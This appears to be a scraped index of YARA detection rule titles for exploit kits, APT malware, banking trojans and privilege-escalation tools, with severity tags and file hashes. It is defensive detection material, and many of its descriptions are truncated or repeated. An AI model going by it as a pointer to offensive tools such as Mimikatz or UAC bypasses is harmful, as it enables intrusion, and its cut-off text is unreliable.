Angler Exploit Kit Detection
Angler Exploit Kit Detection
yara low
Angler Exploit Kit Detection
Angler Exploit Kit Detection
yara low
Angler Exploit Kit Detection
Angler Exploit Kit Detection
yara low
Angler Exploit Kit Detection
BlackHole1 Exploit Kit Detection
yara low
BlackHole1 Exploit Kit Detection
BleedingLife2 Exploit Kit Detection
yara low
BleedingLife2 Exploit Kit Detection
BleedingLife2 Exploit Kit Detection
yara low
BleedingLife2 Exploit Kit Detection
BleedingLife2 Exploit Kit Detection
yara low
BleedingLife2 Exploit Kit Detection
BleedingLife2 Exploit Kit Detection
yara low
BleedingLife2 Exploit Kit Detection
CrimePack Exploit Kit Detection
yara low
CrimePack Exploit Kit Detection
CrimePack Exploit Kit Detection
yara low
CrimePack Exploit Kit Detection
Eleonore Exploit Kit Detection
yara low
Eleonore Exploit Kit Detection
Eleonore Exploit Kit Detection
yara low
This YARA rule detects malicious
Eleonore Exploit Kit Detection
yara low
Eleonore Exploit Kit Detection
Eleonore Exploit Kit Detection
yara low
Eleonore Exploit Kit Detection
Eleonore Exploit Kit Detection
yara low
The 'eleonore_js2' YARA rule detects malicious
Eleonore Exploit Kit Detection
yara low
Eleonore Exploit Kit Detection
Fragus Exploit Kit Detection
yara low
Fragus Exploit Kit Detection
Fragus Exploit Kit Detection
yara low
The
Fragus Exploit Kit Detection
yara low
Fragus Exploit Kit Detection
Fragus Exploit Kit Detection
yara low
Fragus Exploit Kit Detection
Fragus Exploit Kit Detection
yara low
Fragus Exploit Kit Detection
Fragus Exploit Kit Detection
yara low
Fragus Exploit Kit Detection
Fragus Exploit Kit Detection
yara low
The 'fragus_js2'
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
This Y
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Phoenix Exploit Kit Detection
yara low
Phoenix Exploit Kit Detection
Sakura Exploit Kit Detection
yara low
Sakura Exploit Kit Detection
Sakura Exploit Kit Detection
yara low
Sakura Exploit Kit Detection
0x88 Exploit Kit Detection
yara low
0x88 Exploit Kit Detection
0x88 Exploit Kit Detection
yara low
0x88 Exploit Kit Detection
Zeus Exploit Kit Detection
yara low
Zeus Exploit Kit Detection
Detects Cozy Bear / Fancy Bear C2 Server IPs
Detects a pagemgr.exe as mentioned in the CrowdStrike report
Detects Sofacy Malware mentioned in PaloAltoNetworks APT report
Detects Sofacy Malware mentioned in PaloAltoNetworks APT report
Detects Sofacy Malware mentioned in PaloAltoNetworks APT report
Detects Furtim malware - file native.dll
Detects sample mentioned in the Dubnium Report
Detects sample mentioned in the Dubnium Report
Detects sample mentioned in the Dubnium Report
Detects sample mentioned in the Dubnium Report
Detects sample mentioned in the Dubnium Report
Detects sample mentioned in the Dubnium Report
Detects sample mentioned in the Dubnium Report
Detects Turla malware (based on sample used in the RUAG APT case)
Detects Turla malware (based on sample used in the RUAG APT case)
Detects Turla malware (based on sample used in the RUAG APT case)
Detects Turla malware (based on sample used in the RUAG APT case)
Detects a dropper from a CAB file mentioned in the article
Detects trojan from APT report named http.exe
yara critical
Detects trojan from APT report named http.exe
Detects a malicious PotPlayer.dll
yara high
Detects a malicious PotPlayer.dll
Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks
elknot/Billgates variants with XOR like C2 encryption scheme
The "Contains_UserForm_Object" YARA
Detect MIME MSO Base64 encoded ActiveMime file
Detects Sofacy Fysbis Linux Backdoor_Naikon_APT_Sample1
yara critical
Detects Sofacy Fysbis Linux Backdoor_Naikon_APT_Sample1
Detects Sofacy Fysbis Linux Backdoor
yara critical
Detects Sofacy Fysbis Linux Backdoor
Detects Poseidon Group - Malicious Word Document
yara critical
Detects Poseidon Group - Malicious Word Document
Detects Poseidon Group - Malicious Word Document
Detects Poseidon Group Malware
yara critical
Detects Poseidon Group Malware
Detects Codoso APT CustomTCP Malware
yara low
Detects Codoso APT CustomTCP Malware
Codoso CustomTCP Malware
yara low
Codoso CustomTCP Malware
Detects Codoso APT CustomTCP Malware
yara low
Detects Codoso APT CustomTCP Malware
Detects Codoso APT CustomTCP Malware
yara low
Detects Codoso APT CustomTCP Malware
Detects Codoso APT Gh0st Malware
yara low
Detects Codoso APT Gh0st Malware
Detects Codoso APT Gh0st Malware
yara low
Detects Codoso APT Gh0st Malware
Detects Codoso APT Gh0st Malware
yara low
Detects Codoso APT Gh0st Malware
Detects Codoso APT PGV PVID Malware
yara low
Detects Codoso APT PGV PVID Malware
Detects Codoso APT PGV PVID Malware
yara low
Detects Codoso APT PGV PVID Malware
Detects Codoso APT PGV PVID Malware
yara low
Detects Codoso APT PGV PVID Malware
Detects Codoso APT PlugX Malware
yara low
Detects Codoso APT PlugX Malware
Detects Codoso APT PGV PVID Malware
yara low
Detects Codoso APT PGV PVID Malware
Detects Codoso APT PGV_PVID Malware
yara low
Detects Codoso APT PGV_PVID Malware
Detects Codoso APT PlugX Malware
yara low
The YARA
Detects Codoso APT PlugX Malware
yara low
Detects Codoso APT PlugX Malware
Detects Codoso APT PlugX Malware
yara low
The YARA rule 'Codoso_Plug
Detects FakeM malware samples
yara critical
Detects FakeM malware samples
Detect a hidden PE file inside a sequence of numbers (comma separated)
The 'Contains_VBA_macro_code' rule detects MS Office documents containing embedded VBA macro code, commonly
Auto-generated rule - from files 32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614, 3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2, 90ba78b6710462c2d97815e8745679942b3
Auto-generated rule - from files 7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094, b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a, edb16d3ccd50fc8f0f77d0875bf50a629fa
Detects the password of the backdoored DropBear SSH Server - BlackEnergy
Detects KillDisk malware from BlackEnergy
yara critical
Detects KillDisk malware associated with the BlackEnergy campaign, targeting critical infrastructure systems. Deploy this rule in endpoint EDR scanning, email gateway, and file share monitoring to identify and block malicious file execution and
Detects KillDisk malware from BlackEnergy
yara critical
Detects KillDisk malware from BlackEnergy
Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs
Detects DropBear SSH Server (not a threat but used to maintain access)
Detect Emissary Malware - from samples A08E81B411.DAT, ishelp.dll
Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious
yara medium
Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious
Detects Derusbi Kernel Driver
yara critical
Detects Derusbi Kernel Driver
Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)
Derusbi Driver version
yara low
Derusbi Driver version
Derusbi Server Linux version
yara low
Derusbi Server Linux version
Phishing Wave - file P-ORD-C-10156-124658.xls
Phishing Wave - file p0o6543f.exe
yara low
Phishing Wave - file p0o6543f.exe
Detects Fareit Trojan from Sep/Oct 2015 Wave
yara critical
Detects Fareit Trojan from Sep/Oct 2015 Wave
Detects a Winnti malware - FWPKCLNT.SYS
yara high
Detects a Winnti malware - FWPKCLNT.SYS
Detects a Winnti rootkit
yara high
Detects a Winnti rootkit
Detects a Winnti malware - Streamportal
yara high
The YARA rule 'Winnti_malware_StreamPortal_Gen' detects instances of the Winnti malware family associated with the Streamportal campaign, leveraging indicators linked to malicious
Detects a Winnti malware - Update.dll
yara high
Detects a Winnti malware - Update.dll
Detects a signing certificate used by the Winnti APT group
Search for nss3.dll pattern indicating an hexed copy of Citadel malware to work on firefox > v23.0
yara low
Search for nss3.dll pattern indicating an hexed copy of Citadel malware to work on firefox > v23.0
Yara rule related to hook.js, BeEF Browser hooking capability
Detection of Virtual Appliances through the use of WMI for use of evasion.
Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe
Detects malware by Chinese APT PLA Unit 78020 - Generic Rule
Detects malware by Chinese APT PLA Unit 78020 - Generic Rule
Detects malware associated with the Chinese APT group PLA Unit 78020, targeting systems with potential command-and-control or data exfiltration capabilities.
Iron Panda malware DnsTunClient - file named.exe
yara critical
Iron Panda malware DnsTunClient - file named.exe
Iron Panda Malware Htran
yara low
Iron Panda Malware Htran
Iron Panda Malware
yara low
Iron Panda Malware
Iron Panda Malware
yara low
Iron Panda Malware
Iron Panda Malware
yara low
Iron Panda Malware
Iron Panda Malware
yara low
Iron Panda Malware
Iron Panda Malware JSP
yara low
Iron Panda Malware JSP
Encoded Mimikatz in other file types
yara high
Encoded Mimikatz in other file types
Carbanak Malware
yara high
Carbanak Malware
Carbanak Malware
yara high
Carbanak Malware
Carbanak Malware
yara high
Carbanak Malware
Identify DiamondFox
yara low
Identify DiamondFox
Detects Emdivi Malware
yara critical
The Y
Detects Emdivi Malware
yara critical
Detects Emdivi Malware
Detects Emdivi Malware
yara critical
Detects Emdivi Malware
Detects Emdivi Malware
yara critical
Detects Emdivi Malware
Detects Emdivi malware in SFX Archive
yara high
The Emdivi_SFX
Rule to detect Korplug/PlugX FAST variant
Auto-generated rule - file ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300
yara critical
Auto-generated rule - file ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300
Auto-generated rule - from files 32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a, 63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb
Auto-generated rule - file dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8
yara high
Auto-generated rule - file dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8
Threat Group 3390 APT Sample - HttpBrowser RAT Dropper
This YARA rule detects a dropper associated with Threat Group 33
Threat Group 3390 APT Sample - HttpBrowser RAT Generic
yara critical
Detect
Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com
Threat Group 3390 APT Sample - HttpBrowser RAT Sample
yara critical
Threat Group 3390 APT Sample - HttpBrowser RAT Sample
The PlugX_NvSmartMax_Gen YARA rule detects samples
sphinx moth threat group file cudacrt.dll
sphinx moth threat group file h2t.dat
sphinx moth threat group file iastor32.exe
sphinx moth threat group file kerberos32.dll
sphinx moth threat group file kerberos64.dll
sphinx moth threat group file nvcplex.dat
Threat Group 3390 APT - C2 Server
yara high
Threat Group 3390 APT - C2 Server
Threat Group 3390 APT - Strings
yara high
The ThreatGroup3390_Strings rule detects indicators associated with the Threat Group 3390 APT, including hardcoded credentials, C2 domains, and malicious strings used in their campaigns. SOC teams should deploy this rule in endpoint EDR scanning, email gateway
Apolmy Privilege Escalation Trojan used in APT Terracotta
Liudoor Trojan used in Terracotta APT
yara high
Liudoor Trojan used in Terracotta APT
Liudoor Trojan used in Terracotta APT
yara high
Liudoor Trojan used in Terracotta APT
Mitozhan Trojan used in APT Terracotta
yara high
The Mithozhan_Trojan YARA rule detects the Mithozhan malware, associated with the APT Terrac
The RemoteExec_Tool YARA rule detects a Remote Access Tool linked to the A
Exploit Sample CVE-2015-5119
yara high
Exploit Sample CVE-2015-5119
cve 2013 0074
yara low
YARA rule: cve_2013_0074
Detects Liudoor daemon backdoor
yara low
Detects Liudoor daemon backdoor
Detects CloudDuke Malware
yara high
Detects CloudDuke Malware
Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe
MS15-078 / MS15-077 exploit - generic signature
MS15-078 / MS15-077 exploit - Hacking Team code
Dropped File - 1.vbs
yara low
Dropped File - 1.vbs
SFX with voicemail content
yara low
SFX with voicemail content
SFX with adobe.exe content
yara low
SFX with adobe.exe content
MiniDionis Malware - file readerView.exe / adobe.exe
Drop binary as base64 encoded cert trick
yara high
Drop binary as base64 encoded cert trick
SeaDuke Malware - file 3eb86b7b067c296ef53e4857a74e09f12c2b84b666fc130d1f58aec18bc74b0d
Wild Neutron APT Sample Rule - from files 683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9, 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92, 8ca7ed720babb32a6f381769ea
Wild Neutron APT Sample Rule - file 2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94
yara high
Wild Neutron APT Sample Rule - file 2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94
Wild Neutron APT Sample Rule - file 1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7
yara high
Wild Neutron APT Sample Rule - file 1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7
Wild Neutron APT Sample Rule - file 8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f
yara high
Wild Neutron APT Sample Rule - file 8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f
Wild Neutron APT Sample Rule - file c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0
yara high
Wild Neutron APT Sample Rule - file c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0
Wild Neutron APT Sample Rule - file b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45
yara high
Wild Neutron APT Sample Rule - file b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45
Wild Neutron APT Sample Rule - file 1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206
yara high
Wild Neutron APT Sample Rule - file 1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206
Wild Neutron APT Sample Rule - file 4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865
yara high
Wild Neutron APT Sample Rule - file 4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865
Wild Neutron APT Sample Rule - file a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c
yara high
Wild Neutron APT Sample Rule - file a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c
Wild Neutron APT Sample Rule - file 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92
yara high
Wild Neutron APT Sample Rule - file 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92
Wild Neutron APT Sample Rule - file 781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e
yara high
Wild Neutron APT Sample Rule - file 781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e
Hacking Team Disclosure Sample - file ndisk.sys
Hacking Team Disclosure Sample - file elevator.dll
Hacking Team Disclosure Sample - file elevator.exe
Elise Backdoor Trojan
yara low
Elise Backdoor Trojan
Operation Clandestine Wolf signature based on OSINT from 06.23.15
Backdoor Win64 Winnti Pharma
yara low
Backdoor Win64 Winnti Pharma
Sofacy Bundestags APT Batch Script
yara high
Sofacy Bundestags APT Batch Script
Sofacy Group Malware Sample 2
yara high
Sofacy Group Malware Sample 2
Sofacy Group Malware Sample 3
yara high
Sofacy Group Malware Sample 3
Winexe tool used by Sofacy group in Bundestag APT
Kaspersky APT Report - Duqu2 Sample - file d8a849654ab97debaf28ae5b749c3b1ff1812ea49978713853333db48c3972c3
Kaspersky APT Report - Duqu2 Sample - Malicious MSI
Kaspersky APT Report - Duqu2 Sample - file 2a9a5afc342cde12c6eb9a91ad29f7afdfd8f0fb17b983dcfddceccfbc17af69
Kaspersky APT Report - Duqu2 Sample - Generic Rule
Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe
Detects a malware
yara low
Detects a malware
Detects Malware related to PutterPanda
yara high
Detects Malware related to PutterPanda
Detects Malware related to PutterPanda - MSUpdater
Detects Malware related to PutterPanda - MSUpdater
Detects Malware related to PutterPanda - MSUpdater
Detects a malware related to Putter Panda
APT Malware related to PutterPanda Group
yara high
APT Malware related to PutterPanda Group
This YARA rule detects APT malware associated with the Putter
Detects a malware related to Putter Panda
MSUpdater String in Executable
yara medium
MSUpdater String in Executable
The Base64_encoded_Executable rule detects base64-encoded executables, often embedded within files, which
Detects an Microsoft Office file that contains the AutoOpen Macro function
Rule to detect DarkEYEv3 encrypted executables (often malware)
Identify BlackWorm
yara low
Identify BlackWorm
Detects APT backspace
yara low
Detects APT backspace
Detects Samples related to APT17 activity - file FXSST.DLL
Custome SSH backdoor based on python and paramiko - file server.py
Detects exploits for CVE-2015-1674
yara low
Detects exploits for CVE-2015-1674
The 'LightFTP_Config' YARA rule detects configuration files associated with the LightFTP server, which may indicate unauthorized or malicious FTP service setup. SOC teams should
Detects a light FTP server
yara medium
Detects a light FTP server
UACElevator bypassing UAC - file UACElevator.exe
Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor
Detects Win7Elevate - Windows UAC bypass utility
CVE-2015-1701 compiled exploit code
yara high
CVE-2015-1701 compiled exploit code
Malware InstallRex / AntiFW
yara high
Malware InstallRex / AntiFW
Trojan Buzus / Softpulse
yara high
Trojan Buzus / Softpulse
Kraken Bot Sample - file inf.bin
yara critical
Kraken Bot Sample - file inf.bin
Identify Cythosia
yara low
Identify Cythosia
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
http://cylance.com/opcleaver
yara low
http://cylance.com/opcleaver
Identify Dexter POSGrabber
yara low
Identify Dexter POSGrabber
Identify Genome
yara low
Identify Genome
Identify Backoff
yara low
Identify Backoff
Identify Alina
yara low
Identify Alina
Identify Athena HTTP
yara low
Identify Athena HTTP
Polish banking malware
yara low
Polish banking malware
The YARA rule '
Identify version of Drive DDoS malware using compromised sites
Identify Andromeda
yara low
Identify Andromeda
Match first two bytes, files and string present in iBanking
Identify Madness Pro DDoS Malware
yara low
Identify Madness Pro DDoS Malware
Office document with embedded VBA
yara low
The 'office_document_vba' rule detects Office documents containing embedded VBA macros,
Test rule
yara low
Test rule
Shylock Banker
yara low
Shylock Banker
fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620
Identify first version of drive DDoS malware
Identify newer version of drive DDoS malware
Black Revolution DDoS Malware. http://www.arbornetworks.com/asert/2013/05/the-revolution-will-be-written-in-delphi/
Citadel 1.5.x.y trojan banker
yara low
Citadel 1.5.x.y trojan banker
ICE-IX 1.2.x.y trojan banker
yara low
ICE-IX 1.2.x.y trojan banker
SpyEye X.Y memory
yara low
SpyEye X.Y memory
SpyEye X.Y Plugins memory
yara low
SpyEye X.Y Plugins memory